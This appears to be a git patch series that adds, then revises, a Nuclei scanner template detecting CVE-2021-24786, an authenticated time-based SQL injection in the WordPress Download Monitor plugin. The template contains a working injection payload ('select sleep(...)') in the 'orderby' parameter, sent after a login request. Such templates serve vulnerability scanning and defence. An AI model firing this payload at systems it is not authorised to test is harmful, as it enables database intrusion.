From 4785d575326d2fb90fe689c1b8e1a96c0282292f Mon Sep 17 00:00:00 2001
From: Prince Chaddha <prince@projectdiscovery.io>
Date: Sun, 2 Nov 2025 18:25:06 +0400
Subject: [PATCH 1/2] Added CVE-2021-24786

---
 http/cves/2021/CVE-2021-24786.yaml | 50 ++++++++++++++++++++++++++++++
 1 file changed, 50 insertions(+)
 create mode 100644 http/cves/2021/CVE-2021-24786.yaml

diff --git a/http/cves/2021/CVE-2021-24786.yaml b/http/cves/2021/CVE-2021-24786.yaml
new file mode 100644
index 00000000000..7f822eb5f16
--- /dev/null
+++ b/http/cves/2021/CVE-2021-24786.yaml
@@ -0,0 +1,50 @@
+id: CVE-2021-24786
+
+info:
+  name: Download Monitor < 4.4.5 - SQL Injection
+  author: MrHarsh
+  severity: high
+  description: |
+    The Download Monitor plugin for WordPress is vulnerable to SQL injection via the 'orderby' parameter in versions before 4.4.5 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers with administrator-level permissions to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
+  reference:
+    - https://wpscan.com/vulnerability/a6571f16-66d2-449e-af83-1c6ddd56edfa
+    - https://plugins.trac.wordpress.org/changeset/2610899/download-monitor
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 7.2
+    cve-id: CVE-2021-24786
+    cwe-id: CWE-89
+    epss-score: 0.00068
+    epss-percentile: 0.28142
+    cpe: cpe:2.3:a:download_monitor_project:download_monitor:*:*:*:*:*:wordpress:*:*
+  metadata:
+    verified: true
+    max-request: 2
+    vendor: download_monitor_project
+    product: download_monitor
+    framework: wordpress
+    publicwww-query: "/wp-content/plugins/download-monitor/"
+  tags: cve,cve2021,wordpress,wp-plugin,sqli,download-monitor,authenticated
+
+http:
+  - raw:
+      - |
+        POST /wp-login.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        log={{username}}&pwd={{password}}&wp-submit=Log+In
+
+      - |
+        GET /wp-admin/edit.php?post_type=dlm_download&page=download-monitor-logs&orderby=download_date`+and+(select+sleep(6))+and+`user_id=user_id HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'duration_2>=6'
+          - 'status_code_2 == 200'
+          - 'contains(body_2, "download-monitor-logs")'
+        condition: and
+
+# digest: 490a00463044022067f8bb5e2d2e7c4d0f3a9e8c5b2f1d6a3e7c8f5b4d3a2e1f067890abcdef1234022012345678901234567890123456789012345678901234567890123456789012:922c64590222798bb761d5b6d8e72950

From f66ccf8e23bdf96cc6d06b89ab9a05c926e0dba9 Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Wed, 28 Jan 2026 17:42:46 +0530
Subject: [PATCH 2/2] Update CVE-2021-24786.yaml

---
 http/cves/2021/CVE-2021-24786.yaml | 10 +++++-----
 1 file changed, 5 insertions(+), 5 deletions(-)

diff --git a/http/cves/2021/CVE-2021-24786.yaml b/http/cves/2021/CVE-2021-24786.yaml
index 7f822eb5f16..64aec32f6f5 100644
--- a/http/cves/2021/CVE-2021-24786.yaml
+++ b/http/cves/2021/CVE-2021-24786.yaml
@@ -9,6 +9,7 @@ info:
   reference:
     - https://wpscan.com/vulnerability/a6571f16-66d2-449e-af83-1c6ddd56edfa
     - https://plugins.trac.wordpress.org/changeset/2610899/download-monitor
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-24786
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 7.2
@@ -36,15 +37,14 @@ http:
         log={{username}}&pwd={{password}}&wp-submit=Log+In
 
       - |
-        GET /wp-admin/edit.php?post_type=dlm_download&page=download-monitor-logs&orderby=download_date`+and+(select+sleep(6))+and+`user_id=user_id HTTP/1.1
+        @timeout: 30s
+        GET /wp-admin/edit.php?post_type=dlm_download&page=download-monitor-logs&orderby=download_date`+and+(select+sleep(8))+and+`user_id=user_id HTTP/1.1
         Host: {{Hostname}}
 
     matchers:
       - type: dsl
         dsl:
-          - 'duration_2>=6'
+          - 'contains(body_2, "dlm_product")'
           - 'status_code_2 == 200'
-          - 'contains(body_2, "download-monitor-logs")'
+          - 'duration_2 >= 8'
         condition: and
-
-# digest: 490a00463044022067f8bb5e2d2e7c4d0f3a9e8c5b2f1d6a3e7c8f5b4d3a2e1f067890abcdef1234022012345678901234567890123456789012345678901234567890123456789012:922c64590222798bb761d5b6d8e72950